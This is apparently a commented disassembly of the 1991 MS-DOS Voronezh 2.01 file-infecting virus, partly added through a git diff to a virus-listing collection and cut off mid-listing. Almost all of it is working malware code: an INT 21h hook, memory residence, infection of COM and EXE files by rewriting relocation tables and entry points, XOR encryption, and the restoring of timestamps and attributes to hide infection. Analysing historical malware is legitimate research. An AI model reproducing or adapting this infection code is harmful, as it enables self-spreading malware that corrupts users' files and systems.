INT 21h + +24FA 8D165301 lea dx,[0153] ; here 246C +24FE B82125 mov ax,2521 +2501 CD21 int 21 + +2503 5A pop dx ; virus base +2504 BBB002 mov bx,02B0 ; offset of working varible +2507 01D3 add bx,dx ; add base +2509 2E803F00 cmp byte ptr [bx],00 ; carrier type +250D 7441 je 2550 ; carrier is COM file + +; carrier is EXE file + +250F 1F pop ds ; restore DS +2510 8CD8 mov ax,ds ; store new virus segment +2512 0E push cs +2513 1F pop ds +2514 8BCA mov cx,dx +2516 5F pop di ; entry point offset +2517 07 pop es ; entry point segment +2518 50 push ax +2519 83EF05 sub di,0005 ; length of FAR CALL + +; improper handling of the case when relocation item points exactly at +; fifth byte of stored code + +251C BEAF02 mov si,02AF ; extension of buffer +251F 01CE add si,cx ; virus base +2521 8A14 mov dl,[si] ; get sixth byte, this byte may by + ; changed 
during relocation proces + +; this byte should be added to sixth byte in file (counting from entry point) + +2523 26005505 add es:[di+05],dl ; add key +2527 26385505 cmp es:[di+05],dl ; was DL = 0? +252B 7703 ja 2530 ; jump if no + +252D 4E dec si +252E FE04 inc byte ptr [si] + +2530 8BD7 mov dx,di ; destination +2532 BEAA02 mov si,02AA ; source buffer +2535 01CE add si,cx ; add base +2537 B90500 mov cx,0005 ; number of bytes +253A F3A4 rep movsb +253C 1F pop ds + +253D 06 push es ; prepare long jump +253E 52 push dx +253F 8CD8 mov ax,ds ; reset registers +2541 8EC0 mov es,ax +2543 31C0 xor ax,ax +2545 31DB xor bx,bx +2547 31C9 xor cx,cx +2549 31D2 xor dx,dx +254B 31F6 xor si,si +254D 31FF xor di,di +254F CB retf ; jump to application + +; exit to COM application + +2550 8CC8 mov ax,cs +2552 8ED8 mov ds,ax +2554 8EC0 mov es,ax +2556 BE6802 mov si,0268 ; offset of encryption routine +2559 B90001 mov cx,0100 ; number of bytes +255C BB8102 mov bx,0281 ; file size +255F 8B3F mov di,[bx] +2561 83FF00 cmp di,0000 ; ?? 
+2564 7502 jne 2568 + +2566 CD20 int 20 ; terminate + +; form destination address + +2568 BB8302 mov bx,0283 ; place holder for virus length +256B 8B07 mov ax,[bx] ; virus length +256D 01C7 add di,ax ; add to file size +256F 81C70001 add di,0100 ; size of PSP +2573 FC cld +2574 57 push di ; destination address +2575 F3A4 rep movsb ; move part of code +2577 5F pop di ; restore address +2578 8B0E8302 mov cx,[0283] ; virus size +257C A18102 mov ax,[0281] ; file length +257F 57 push di ; prepare jump +2580 C3 ret ; jump to moved code (here 2581) + +;-------------------- +; encryption routine + +2581 050001 add ax,0100 ; PSP size +2584 8BF0 mov si,ax ; offset of encrypted block +2586 BF0001 mov di,0100 ; destination +2589 FC cld + +; decrypt block and copy it to begin of file + +258A 8A04 mov al,[si] +258C 34BB xor al,BB +258E 8805 mov [di],al +2590 46 inc si +2591 47 inc di +2592 E2F6 loop 258A + +; jump to application + +2594 B80001 mov ax,0100 ; entry point for EXE +2597 5B pop bx ; balance stack +2598 50 push ax ; prepare jump +2599 C3 ret ; jump to COM + +; working area + +259A 1926 ; [base + 0281] low word of file size +259C 4006 ; [base + 0283] size of virus, (high word of file length) +259E 014C ; [base + 0285] old INT 24h (offset) +25A0 169F ; [base + 0287] old INT 24h (segment) + +25A2 45 58 45 ; [base + 0289] 'EXE' +25A5 65 78 65 ; [base + 028C] 'exe' + +; unused + +; below line after xoring with 1A become: OleynikozL - name of the wirus author + +25A8 55 76 7F 63 74 73 71 75 60 56 ; Uvctsqu` + +25B1 56 6F 72 6F 6E 65 7A 68 2C ; Voronezh, +25BA 31 39 39 30 20 32 2E 30 31 ; 1990 2.01 + +; used data + +25C3 FC 0E 1F BA BB ; [base + 02AA] starting 5 bytes of EXE file +25C8 00 ; [base + 02AF] this byte is added to 02AE + ; if it is 0 then [02AE] is decreased by 1 +25C9 01 ; [base + 02B0] carrier type: 0 - EXE, 1 - COM + +25CA 0002 ; [base + 02B1] offset in header for new relocation entry +25CC E61E ; [base + 02B3] IP of EXE file +25CE 0000 ; [base + 02B5] CS of 
EXE file +25D0 0000 +25D2 00 +25D3 0000 ; [base + 02BA] virus entry point in file on disk +25D5 E620 ; [base + 02BC] - [02B1] +25D7 0000 ; [base + 02BE] segment of virus entry point +25D9 1924 ; [base + 02C0] offset +25DB 9A ; [base + 02C2] code of CALL SSSS:OOOO +25DC 1924 ; [base + 02C3] OOOO +25DE 0000 ; [base + 02C5] SSSS +25E0 0000 ; [base + 02C7] file position low word +25E2 1E00 ; [base + 02C9] file position high word +25E4 0001 ; [base + 02CB] size of buffer +25E6 0000 ; [base + 02CD] total size of readed part of ReloTabl +25E8 00 ; [base + 02CF] number of disk (0 - default, 1 - A, ...) +25E9 2000 ; [base + 02D0] file attributes +25EB B438 ; [base + 02D2] offset of file name +25ED 0F4C ; [base + 02D4] segment of file name + +;----------------- +; INT 24h handler + +25EF CF iret + +; jump here if EXE file is open or sam program is loaded and executed + +; check file name, skip file if fourth and fifth characters in path are 'CO' + +25F0 8BDA mov bx,dx ; offset of path +25F2 3E8B4703 mov ax,ds:[bx+03] ; skip 'd:\' (?) +25F6 3D434F cmp ax,4F43 ; 'CO' protect 'C:\COMMAND.COM' ? +25F9 7503 jne 25FE + +25FB E9D3FE jmp 24D1 ; jump to old INT 21h + +; check presence of disk specyfication + +25FE 8BFA mov di,dx ; offset of path +2600 31C0 xor ax,ax +2602 2EC606CF0200 mov byte ptr [02CF],00 ; default +2608 3E807D013A cmp ds:byte ptr [di+01],3A ; ':' is disk specified? +260D 7509 jne 2618 ; no + +; convert disk specyfication to number (A - 1, B - 2, ...) 
+
+260F 3E8A05 mov al,ds:[di]
+2612 249F and al,9F ; convert
+2614 2EA2CF02 mov [02CF],al ; store disk number
+
+2618 B80043 mov ax,4300 ; get file attributes
+261B CD21 int 21
+
+; store address of path and file attributes
+
+261D 2E890ED002 mov [02D0],cx
+2622 2E8C1ED202 mov [02D2],ds
+2627 2E8916D402 mov [02D4],dx
+
+; intercepte INT 24h
+
+262C 1E push ds
+262D 52 push dx
+262E 06 push es
+
+262F 0E push cs
+2630 1F pop ds
+2631 B82435 mov ax,3524
+2634 CD21 int 21
+2636 891E8502 mov [0285],bx
+263A 8C068702 mov [0287],es
+
+263E BAD602 mov dx,02D6
+2641 B82425 mov ax,2524
+2644 CD21 int 21
+
+2646 07 pop es
+2647 5A pop dx
+2648 1F pop ds
+
+2649 1E push ds
+
+264A 0E push cs
+264B 1F pop ds
+
+264C BB0001 mov bx,0100
+264F B94007 mov cx,0740 ; offset of buffer
+2652 29D9 sub cx,bx ; virus length
+2654 BB8302 mov bx,0283 ; offset of varible
+2657 890F mov [bx],cx ; size of virus/crypted block
+
+2659 1F pop ds
+
+265A 8BDA mov bx,dx ; waste of time
+265C 1E push ds ; store address of path
+265D 52 push dx
+265E 53 push bx ; waste of time
+
+265F 0E push cs
+2660 1F pop ds
+
+2661 B436 mov ah,36 ; disk free
+2663 8A16CF02 mov dl,[02CF] ; disk number
+2667 CD21 int 21
+
+2669 3DFFFF cmp ax,FFFF ; check for error
+266C 7509 jne 2677 ; ok
+
+; disk not accessible, exit
+
+266E 58 pop ax ; balance stack
+266F 58 pop ax
+2670 58 pop ax
+2671 E8A203 call 2A16 ; restore INT 24h
+2674 E95AFE jmp 24D1 ; jump to old INT 21h
+
+; convert disk free space into bytes
+
+2677 F7E3 mul bx
+2679 F7E1 mul cx
+267B 09D2 or dx,dx
+267D 7506 jne 2685 ; plenty of free room
+
+267F 3B068302 cmp ax,[0283] ; minimum disk free space
+2683 72E9 jb 266E ; disk full, exit
+
+2685 5B pop bx ; balance stack
+2686 5A pop dx ; path address
+2687 1F pop ds
+2688 B8003D mov ax,3D00 ; open file for read only
+268B 9C pushf
+268C FA cli
+268D 9A60147902 call 0279:1460 ; old INT 21h
+
+; ^^^^^^^^ old INT 21h (place holder)
+
+2692 7306 jnb 269A ; OK
+
+2694 E87F03 call 2A16 ; restore INT 24h
+2697 E937FE jmp 24D1 ; jump to old INT 21h
+
+269A 50 push ax ; store handle
+269B 8CC8 mov ax,cs ; set DS and ES to virus segment
+269D 8ED8 mov ds,ax
+269F 8EC0 mov es,ax
+26A1 58 pop ax ; restore handle
+26A2 50 push ax ; store handle
+26A3 8BD8 mov bx,ax
+26A5 B80057 mov ax,5700 ; get file time/date stamp
+26A8 CD21 int 21
+
+26AA 58 pop ax ; restore handle
+26AB 51 push cx ; attributes
+26AC 52 push dx ; offset of path
+26AD 50 push ax ; handle
+
+; get file size
+
+26AE 8BD8 mov bx,ax ; handle
+26B0 B90000 mov cx,0000
+26B3 BA0000 mov dx,0000
+26B6 B442 mov ah,42 ; move file ptr
+26B8 B002 mov al,02 ; to EOF
+26BA CD21 int 21
+
+26BC BB8102 mov bx,0281 ; store low word of file length
+26BF 8907 mov [bx],ax
+
+; waste of time or programmers error
+
+26C1 BB8302 mov bx,0283 ; 'store' high word of file length
+26C4 8B0F mov cx,[bx] ; <- error (?), maybe: mov [bx],cx ?
+
+; move file ptr to BOF
+
+26C6 B90000 mov cx,0000
+26C9 BA0000 mov dx,0000
+26CC B80042 mov ax,4200 ; move file ptr to BOF
+26CF 5B pop bx ; restore handle
+26D0 53 push bx
+26D1 CD21 int 21
+
+; read [0283] bytes of file to buffer located above virus
+
+26D3 BB8302 mov bx,0283 ; working varible
+26D6 8B0F mov cx,[bx] ; length of virus/encrypted block
+26D8 5B pop bx ; restore handle
+26D9 53 push bx
+26DA BA4007 mov dx,0740 ; buffer
+26DD B43F mov ah,3F ; read file
+26DF CD21 int 21
+
+26E1 BE4007 mov si,0740 ; buffer
+26E4 8B0C mov cx,[si] ; first word
+26E6 81F98CD8 cmp cx,D88C ; signature in COM file
+26EA 7509 jne 26F5 ; clear COM or EXE file
+
+; this is infected COM file, exit
+
+26EC 5B pop bx ; handle
+26ED 58 pop ax ; balance stack
+26EE 58 pop ax
+26EF E81F03 call 2A11 ; close file and restore INT 24h
+26F2 E9DCFD jmp 24D1 ; jump to old INT 21h
+
+; is it EXE file or clear COM?
+
+26F5 81F94D5A cmp cx,5A4D ; EXE marker
+26F9 7403 je 26FE ; yes
+
+26FB E98902 jmp 2987 ; infect COM file
+
+; check EXE file
+
+26FE 5B pop bx ; restore handle
+26FF 53 push bx
+2700 B80042 mov ax,4200 ; move file ptr to BOF
+2703 31C9 xor cx,cx
+2705 31D2 xor dx,dx
+2707 CD21 int 21
+
+2709 B93200 mov cx,0032 ; block size
+270C B8003F mov ax,3F00 ; read file
+270F 8D164007 lea dx,[0740] ; buffer
+2713 CD21 int 21
+
+; check free place in relocation table
+
+2715 A14607 mov ax,[0746] ; ReloCnt
+2718 B90400 mov cx,0004 ; entry size
+271B F7E1 mul cx ; AX size of relocation table
+271D 8B1E5807 mov bx,[0758] ; TablOff
+2721 01D8 add ax,bx
+2723 8BD0 mov dx,ax ; size of used area in header
+2725 8BFA mov di,dx
+2727 A14807 mov ax,[0748] ; HdrSize
+272A B91000 mov cx,0010 ; convert to bytes
+272D F7E1 mul cx
+272F 8BD7 mov dx,di ; used header size
+2731 83C204 add dx,0004 ; one additional entry
+2734 39D0 cmp ax,dx ; is free space?
+2736 7703 ja 273B ; yes
+
+2738 E94902 jmp 2984 ; relocation table is full, exit
+
+; prepare new header
+
+273B A3B102 mov [02B1],ax ; offset of first unused entry
+273E A14607 mov ax,[0746] ; ReloCnt
+2741 40 inc ax ; add one entry
+2742 A34607 mov [0746],ax ; ReloCnt, store new value of counter
+2745 A15407 mov ax,[0754] ; IP
+2748 A3B302 mov [02B3],ax ; store oryginal IP
+274B A15607 mov ax,[0756] ; CS
+274E A3B502 mov [02B5],ax ; store oryginal CS
+2751 31D2 xor dx,dx
+2753 31C9 xor cx,cx
+2755 B80242 mov ax,4202 ; move file ptr to EOF
+2758 5B pop bx ; restore handle
+2759 53 push bx
+275A CD21 int 21
+
+275C 50 push ax ; store file length
+275D 52 push dx
+275E 03068302 add ax,[0283] ; find new file length
+2762 3B068302 cmp ax,[0283] ; long integer addition
+2766 7701 ja 2769
+
+2768 42 inc dx ; high word of file length
+
+2769 B90002 mov cx,0200 ; convert into 512 byte pages
+276C F7F1 div cx
+276E 83FA00 cmp dx,0000 ; last page non empty?
+2771 7401 je 2774
+
+2773 40 inc ax ; count last page
+
+; check if header information match to real file size
+
+2774 8B1E4407 mov bx,[0744] ; PageCnt
+2778 8BC8 mov cx,ax ; new PageCnt
+277A 29D9 sub cx,bx ; diference
+277C 83F905 cmp cx,0005 ; maximum possible
+277F 7205 jb 2786 ; OK, continue infection
+
+; there is some information above program in EXE file, do not infect such a
+; file, exit
+
+2781 58 pop ax
+2782 58 pop ax
+2783 E9FE01 jmp 2984
+
+; continue infection
+
+2786 A34407 mov [0744],ax ; PageCnt, store new value
+2789 5A pop dx ; restore file length
+278A 58 pop ax ; low word of file length
+278B 8B1EB102 mov bx,[02B1] ; position of free relocation entry
+278F 39D8 cmp ax,bx
+2791 7205 jb 2798
+
+; find length of file part above last entry in relocation table
+
+2793 29D8 sub ax,bx
+2795 EB04 jmp 279B
+2797 90 nop
+
+2798 29D8 sub ax,bx
+279A 4A dec dx
+
+279B 8916BE02 mov [02BE],dx ; address of virus entry point (segment)
+279F A3C002 mov [02C0],ax ; offset
+27A2 A1B102 mov ax,[02B1] ; offset in relocation table
+27A5 8B1EB302 mov bx,[02B3] ; IP
+27A9 BA0000 mov dx,0000 ; prepare long integer addition
+27AC 01D8 add ax,bx ; add long integer
+27AE 39D8 cmp ax,bx
+27B0 7701 ja 27B3
+
+27B2 42 inc dx
+
+27B3 8BF0 mov si,ax ; offset of entry point
+27B5 8BFA mov di,dx ; high word
+27B7 A1B502 mov ax,[02B5] ; CS
+27BA B91000 mov cx,0010 ; convert to bytes
+27BD F7E1 mul cx
+27BF 01D7 add di,dx ; high word
+27C1 01C6 add si,ax ; low word
+27C3 39C6 cmp si,ax
+27C5 7701 ja 27C8
+
+27C7 47 inc di
+
+; store distance in file between first free entry in relocation table and
+; program entry point in disk file
+
+27C8 8BC6 mov ax,si
+27CA 8BD7 mov dx,di
+27CC 8916BA02 mov [02BA],dx
+27D0 A3BC02 mov [02BC],ax
+
+; move file position to entry point
+
+27D3 8BCA mov cx,dx
+27D5 8BD0 mov dx,ax
+27D7 B80042 mov ax,4200 ; move file ptr
+27DA C606B00201 mov byte ptr [02B0],01 ; flag: EXE file
+27DF C606AF0200 mov byte ptr [02AF],00 ; buffer extension
+27E4 5B pop bx ; handle
+27E5 53 push bx
+27E6 CD21 int 21
+
+; read oryginal five bytes from entry point
+
+27E8 B90500 mov cx,0005 ; number of bytes
+27EB 8D16AA02 lea dx,[02AA] ; local buffer
+27EF B8003F mov ax,3F00 ; read file
+27F2 CD21 int 21
+
+27F4 803EAA029A cmp byte ptr [02AA],9A ; signature
+27F9 7503 jne 27FE ; not infected, continue
+
+27FB E98601 jmp 2984 ; do not infect, exit
+
+; continue infection
+
+27FE E82302 call 2A24 ; clear attributes and reopen for read/write
+
+; move file ptr to first not used entry in relocation table
+
+2801 8B1E5807 mov bx,[0758] ; TableOff
+2805 A14607 mov ax,[0746] ; ReloCnt
+2808 48 dec ax ; count starts from zero
+2809 B90400 mov cx,0004 ; entry size
+280C F7E1 mul cx
+280E 01C3 add bx,ax ; offset in table
+2810 B90000 mov cx,0000
+2813 8BD3 mov dx,bx
+2815 B80042 mov ax,4200 ; move file ptr to BOF
+2818 5B pop bx ; handle
+2819 53 push bx
+281A CD21 int 21
+
+; write new relocation table entry
+
+281C 8B16B302 mov dx,[02B3] ; IP
+2820 83C203 add dx,0003 ; length of instruction code and offset
+2823 8916B302 mov [02B3],dx ; pointer to segment word
+2827 8D16B302 lea dx,[02B3] ; buffer with CS:IP
+282B B90400 mov cx,0004 ; buffer size
+282E B440 mov ah,40 ; write file
+2830 5B pop bx ; handle
+2831 53 push bx
+2832 CD21 int 21
+
+; restore IP in [02B3]
+
+2834 8B16B302 mov dx,[02B3]
+2838 83EA03 sub dx,0003
+283B 8916B302 mov [02B3],dx
+
+; move file ptr to begin of file
+
+283F 31D2 xor dx,dx
+2841 31C9 xor cx,cx
+2843 B80042 mov ax,4200 ; move file ptr to BOF
+2846 5B pop bx ; handle
+2847 53 push bx
+2848 CD21 int 21
+
+; write new header to file
+
+284A 8B0E5807 mov cx,[0758] ; TableOff, number of bytes to write
+284E 8D164007 lea dx,[0740] ; offset of buffer
+2852 B440 mov ah,40 ; write file
+2854 CD21 int 21
+
+; form code for instruction of far call to virus
+
+2856 C606C2029A mov byte ptr [02C2],9A ; code for CALL ssss:oooo
+285B A1C002 mov ax,[02C0] ; offset of virus entry point in RAM
+285E A3C302 mov [02C3],ax ; store in buffer
+2861 A1BE02 mov ax,[02BE] ; segment
+2864 B90010 mov cx,1000 ; ??
+2867 F7E1 mul cx
+2869 A3C502 mov [02C5],ax ; new segment
+286C 813EC30200F0 cmp word ptr [02C3],F000
+2872 7215 jb 2889
+
+; keep offset below F000
+
+2874 A1C302 mov ax,[02C3]
+2877 8B16C502 mov dx,[02C5]
+287B 81C20001 add dx,0100 ; adjust segment
+287F 2D0010 sub ax,1000 ; decrease offset
+2882 8916C502 mov [02C5],dx ; store new values
+2886 A3C302 mov [02C3],ax
+
+; write to disk new entry point code
+
+2889 8B0EBA02 mov cx,[02BA] ; virus entry point on disk file
+288D 8B16BC02 mov dx,[02BC]
+2891 B80042 mov ax,4200 ; move file ptr
+2894 5B pop bx
+2895 53 push bx
+2896 CD21 int 21
+
+2898 B90500 mov cx,0005 ; buffer length
+289B B440 mov ah,40 ; write file
+289D 8D16C202 lea dx,[02C2] ; buffeer with CALL SSSS:OOOO
+28A1 CD21 int 21
+
+; append to file virus code
+
+28A3 B90000 mov cx,0000
+28A6 BA0000 mov dx,0000
+28A9 B80242 mov ax,4202 ; move file ptr to EOF
+28AC 5B pop bx ; handle
+28AD 53 push bx
+28AE CD21 int 21
+
+28B0 B440 mov ah,40 ; write file
+28B2 8B0E8302 mov cx,[0283] ; virus length
+28B6 BA0001 mov dx,0100 ; offset of virus code in RAM
+28B9 CD21 int 21
+
+; analyse relocation table
+
+28BB 31C9 xor cx,cx
+28BD 8B165807 mov dx,[0758] ; TablOff
+28C1 B80042 mov ax,4200 ; move file ptr
+28C4 5B pop bx ; handle
+28C5 53 push bx
+28C6 CD21 int 21
+
+28C8 C706CD020000 mov word ptr [02CD],0000
+28CE 8916C702 mov [02C7],dx ; store file position
+28D2 A3C902 mov [02C9],ax
+28D5 A14607 mov ax,[0746] ; ReloCnt
+28D8 BF0000 mov di,0000
+28DB 48 dec ax ; restore oryginal value
+28DC 3D0000 cmp ax,0000
+28DF 7503 jne 28E4 ; analyse relocation table
+
+; if oryginal relocation table was empty then exit
+
+28E1 E9A000 jmp 2984 ; close file, restore attr etc.
+
+; find size of relocation table
+
+28E4 B90400 mov cx,0004
+28E7 F7E1 mul cx
+28E9 8BF0 mov si,ax ; offset of last used entry
+
+; get current file position (this is the begin of relocation teble)
+
+28EB B90000 mov cx,0000
+28EE BA0000 mov dx,0000
+28F1 B80142 mov ax,4201 ; move file ptr rel current position
+28F4 CD21 int 21
+
+; read part of relocation table
+
+28F6 8916C702 mov [02C7],dx ; store file position
+28FA A3C902 mov [02C9],ax
+28FD B90001 mov cx,0100 ; number of bytes
+2900 BA0000 mov dx,0000 ; buffer
+2903 B8003F mov ax,3F00 ; read file
+2906 CD21 int 21
+
+2908 BF0000 mov di,0000 ; point at relocation table
+290B A3CB02 mov [02CB],ax ; number of bytes readed
+290E 0106CD02 add [02CD],ax ; total number of readed bytes
+
+; check relocation table entry
+
+2912 8B4502 mov ax,[di+02] ; get segment
+2915 3B06B502 cmp ax,[02B5] ; is it CS
+2919 7551 jne 296C ; check next entry
+
+291B 8B05 mov ax,[di] ; get offset
+291D 3B06B302 cmp ax,[02B3] ; is it IP
+2921 7249 jb 296C ; check next entry
+
+; relocatin item points at entry point or above
+
+2923 A1B302 mov ax,[02B3] ; IP
+2926 050500 add ax,0005 ; length of far call
+2929 3B05 cmp ax,[di] ; relocation item point inside call code
+292B 763F jbe 296C ; no, consider next entry
+
+; modify relocation table and write it to file
+; let relocation item point at the same code but now stored in virus
+; body in local buffer
+
+292D A1C502 mov ax,[02C5] ; segment of virus entry point
+2930 894502 mov [di+02],ax ; store in buffer
+2933 8B05 mov ax,[di] ; offset
+2935 8B1EB302 mov bx,[02B3] ; old IP
+2939 29D8 sub ax,bx
+293B 50 push ax ; store
+293C B8AA02 mov ax,02AA ; offset of local buffer
+293F 2D0001 sub ax,0100 ; offset in virus body
+2942 8B1EC302 mov bx,[02C3] ; offset of entry point in RAM
+2946 01D8 add ax,bx
+2948 5B pop bx
+2949 01D8 add ax,bx
+294B 8905 mov [di],ax ; new offset
+294D 8B0EC702 mov cx,[02C7] ; restore file position
+2951 8B16C902 mov dx,[02C9]
+2955 B80042 mov ax,4200 ; move file ptr
+2958 5B pop bx ; restore handle
+2959 53 push bx
+295A CD21 int 21
+
+295C 8B0ECB02 mov cx,[02CB] ; number of bytes
+2960 B440 mov ah,40 ; write file
+2962 5B pop bx ; handle
+2963 53 push bx
+2964 BA0000 mov dx,0000 ; from
+2967 CD21 int 21
+2969 EB19 jmp 2984 ; close file, etc. exit
+296B 90 nop
+
+296C 83C704 add di,0004 ; next entry in relocation table
+296F A1CD02 mov ax,[02CD] ; number of readed bytes
+2972 2D0001 sub ax,0100 ; buffer size
+2975 01F8 add ax,di ; current position in table
+2977 39F0 cmp ax,si ; table size
+2979 7409 je 2984 ; close file, etc. exit
+
+297B 3B3ECB02 cmp di,[02CB] ; end of buffer?
+297F 7291 jb 2912 ; no, check next relocation item
+
+2981 E967FF jmp 28EB ; read next part of relocation table
+
+2984 EB67 jmp 29ED ; close file, etc. and exit
+2986 90 nop
+
+;-------------------
+; infect COM file
+
+; check maximum file size
+
+2987 8B0E8102 mov cx,[0281] ; file size
+298B 81F948EE cmp cx,EE48 ; maximum file size (61000)
+298F 7209 jb 299A
+
+; file too long or too short, exit
+
+2991 5B pop bx
+2992 58 pop ax
+2993 58 pop ax
+2994 E87A00 call 2A11 ; close file and restore INT 24h
+2997 E937FB jmp 24D1 ; jump to old INT 21h
+
+; check minimum file size
+
+299A 3B0E8302 cmp cx,[0283] ; virus length, minimum file size
+299E 72F1 jb 2991 ; file too short, exit
+
+29A0 E88100 call 2A24 ; clear attributes and reopen file
+29A3 C606B00200 mov byte ptr [02B0],00
+
+; get file size
+
+29A8 BA0000 mov dx,0000
+29AB B90000 mov cx,0000
+29AE B80242 mov ax,4202 ; move file ptr to EOF
+29B1 5B pop bx ; restore handle
+29B2 53 push bx
+29B3 CD21 int 21
+
+29B5 BE8302 mov si,0283
+29B8 8B0C mov cx,[si] ; virus size
+29BA B440 mov ah,40 ; write file
+29BC 51 push cx
+29BD BB4007 mov bx,0740 ; offset of buffer
+
+; encrypt block
+
+29C0 8A07 mov al,[bx]
+29C2 34BB xor al,BB
+29C4 8807 mov [bx],al
+29C6 43 inc bx
+29C7 E2F7 loop 29C0
+
+; write to file
+
+29C9 59 pop cx ; block size
+29CA 5B pop bx ; handle
+29CB 53 push bx
+29CC BA4007 mov dx,0740 ; offset of buffer
+29CF CD21 int 21
+
+29D1 B80042 mov ax,4200 ; move file ptr to BOF
+29D4 BA0000 mov dx,0000
+29D7 B90000 mov cx,0000
+29DA CD21 int 21
+
+29DC BB1001 mov bx,0110 ; faked instruction
+
+29DF BE8302 mov si,0283
+29E2 8B0C mov cx,[si]
+29E4 BA0001 mov dx,0100
+29E7 B440 mov ah,40 ; write file
+29E9 5B pop bx ; handle
+29EA 53 push bx
+29EB CD21 int 21
+
+; common (EXE and COM) exit code, restore file date/time stamp
+
+29ED 5B pop bx ; handle
+29EE 5A pop dx ; file date stamp
+29EF 59 pop cx ; file time stamp
+29F0 53 push bx ; store handle
+29F1 B80157 mov ax,5701 ; restore file time/date stamp
+29F4 CD21 int 21
+
+; restore file attributes
+
+29F6 8B16D402 mov dx,[02D4] ; path offset
+29FA 8E1ED202 mov ds,[02D2] ; path segment
+29FE B80143 mov ax,4301 ; set file attributes
+2A01 2E8B0ED002 mov cx,cs:[02D0] ; restore attributes
+2A06 CD21 int 21
+
+2A08 0E push cs
+2A09 1F pop ds
+2A0A 5B pop bx ; handle
+2A0B E80300 call 2A11 ; close file and restore INT 24h
+2A0E E9C0FA jmp 24D1 ; jump to old INT 21h
+
+;-------------------------------
+; close file and restore INT 24h
+
+2A11 B8003E mov ax,3E00 ; close file
+2A14 CD21 int 21
+
+;----------------
+; restore INT 24h
+
+2A16 8B1E8502 mov bx,[0285]
+2A1A 8E068702 mov es,[0287]
+2A1E B82425 mov ax,2524 ; restore INT 24h
+2A21 CD21 int 21
+2A23 C3 ret
+
+;------------------------------------------------
+; clear file attributes and reopen for read/write
+
+2A24 55 push bp
+2A25 8BEC mov bp,sp
+2A27 1E push ds
+2A28 B80143 mov ax,4301 ; set file attributes
+2A2B 8B16D402 mov dx,[02D4] ; path offset
+2A2F 8E1ED202 mov ds,[02D2] ; path segment
+2A33 31C9 xor cx,cx ; clear all
+2A35 CD21 int 21
+
+2A37 7306 jnb 2A3F ; continue
+
+; exit to old INT 21h
+
+2A39 1F pop ds
+2A3A 5D pop bp
+2A3B 58 pop ax
+2A3C E945FF jmp 2984 ; exit
+
+2A3F 368B5E04 mov bx,ss:[bp+04] ; restore handle
+2A43 B8003E mov ax,3E00 ; close file
+2A46 CD21 int 21
+
+2A48 B8023D mov ax,3D02 ; open file for read/write
+2A4B FA cli
+2A4C 9C pushf
+2A4D 2EFF1EC201 call far [01C2] ; old INT 21h
+2A52 1F pop ds
+
+2A53 36894604 mov ss:[bp+04],ax ; handle
+2A57 5D pop bp
+2A58 C3 ret
+
+; end of file
+;----------------------------------------
+; buffer for header of infected EXE file
+
+cs:0740 ; 'MZ'
+cs:0742 ; PartPag
+cs:0744 ; PageCnt
+cs:0746 ; ReloCnt
+cs:0748 ; HdrSize
+cs:074a ; MinMem
+cs:074c ; MaxMem
+cs:074e ; ReloSS
+cs:0750 ; ExeSP
+cs:0752 ; ChkSum
+cs:0754 ; ExeIP
+cs:0756 ; ReloCS
+cs:0758 ; TablOff
+cs:075a ; Overlay
+
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.vor_1600.lst b/MSDOS/Virus.MSDOS.Unknown.vor_1600.lst
new file mode 100644
index 00000000..7a0d586a
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.vor_1600.lst
@@ -0,0 +1,1063 @@
+;=======================================================
+; Virus Voronez 2.01 (August 1991 Zielona Gora, Poland)
+;
+; Disassembled by Andrzej Kadlof 1991 August
+;
+; (C) Polish Section Of Virus Information Bank
+;=======================================================
+
+1EE6 9A19240657 call 5706:2419
+
+; victim code
+
+1EEB 1E push ds
+1EEC B82325 mov ax,2523
+
+;...
+;
+;-------------------
+; virus entry point
+
+2419 8CD8 mov ax,ds
+241B 0E push cs
+241C 1F pop ds
+241D 50 push ax
+241E E80000 call 2421 ; get own offset
+2421 5B pop bx
+
+2422 81EB0801 sub bx,0108 ; virus base
+2426 53 push bx
+
+; is virus present in RAM?
+
+2427 B4AB mov ah,AB ; call for resident part
+2429 CD21 int 21
+
+242B 3D5555 cmp ax,5555 ; expected answer
+242E 7503 jne 2433 ; not instaled
+
+2430 E9D000 jmp 2503 ; instaled, exit
+
+; install wirus in RAM
+
+2433 8CC0 mov ax,es ; PSP segment
+2435 2D0100 sub ax,0001 ; MCB segment
+2438 8ED8 mov ds,ax
+243A BB0300 mov bx,0003 ; offset of size of block in MCB
+243D 3E8B07 mov ax,ds:[bx] ; get size
+2440 2DEA00 sub ax,00EA ; reserve 0EA0h bytes for virus (3744)
+2443 3E8907 mov ds:[bx],ax ; store new block size
+2446 06 push es ; restore DS
+2447 1F pop ds
+2448 BB0200 mov bx,0002 ; offset of MEM size in PSP
+244B 3E8B07 mov ax,ds:[bx] ; get MEM size
+244E 2DEA00 sub ax,00EA ; decrease by 3744 bytes
+2451 3E8907 mov ds:[bx],ax ; set new value in PSP
+2454 8EC0 mov es,ax ; segment for new virus location
+2456 BF0001 mov di,0100 ; offset of destination
+2459 BE0001 mov si,0100 ; offset of source
+245C 5B pop bx ; virus base
+245D 53 push bx
+245E 01DE add si,bx ; start of virus code
+2460 0E push cs ; set DS to virus code
+2461 1F pop ds
+2462 B9A406 mov cx,06A4 ; length (1700)
+2465 F3A4 rep movsb ; move to new place
+2467 8BD0 mov dx,ax ; segment of new location
+2469 EB74 jmp 24DF ; continue
+246B 90 nop
+
+;------------------
+; INT 21h handler
+
+246C 9C pushf
+246D FB sti
+246E 80FCAB cmp ah,AB ; virus call
+2471 7505 jne 2478 ; no
+
+2473 B85555 mov ax,5555 ; answer: I'm here
+2476 9D popf
+2477 CF iret
+
+2478 3D003D cmp ax,3D00 ; open file for read only
+247B 7540 jne 24BD
+
+; open file for read only
+
+247D 50 push ax
+247E 53 push bx
+247F 51 push cx
+2480 52 push dx
+2481 56 push si
+2482 57 push di
+2483 06 push es
+2484 B94100 mov cx,0041 ; maximum path length
+2487 30C0 xor al,al
+2489 8BFA mov di,dx ; offset of path
+248B 1E push ds
+248C 07 pop es
+248D F2AE repnz scasb ; find end of string
+248F 83EF04 sub di,0004 ; point at extension
+2492 8BF7 mov si,di
+2494 56 push si ; offset of extension
+2495 0E push cs
+2496 07 pop es
+2497 B90400 mov cx,0004 ; extension length
+249A BF8902 mov di,0289 ; is it EXE?
+249D F3A6 rep cmpsb
+249F 83F900 cmp cx,0000
+24A2 7504 jne 24A8
+
+24A4 5E pop si ; balance stack
+24A5 EB0D jmp 24B4 ; skip exe comparison
+24A7 90 nop
+
+24A8 BF8C02 mov di,028C ; is it exe?
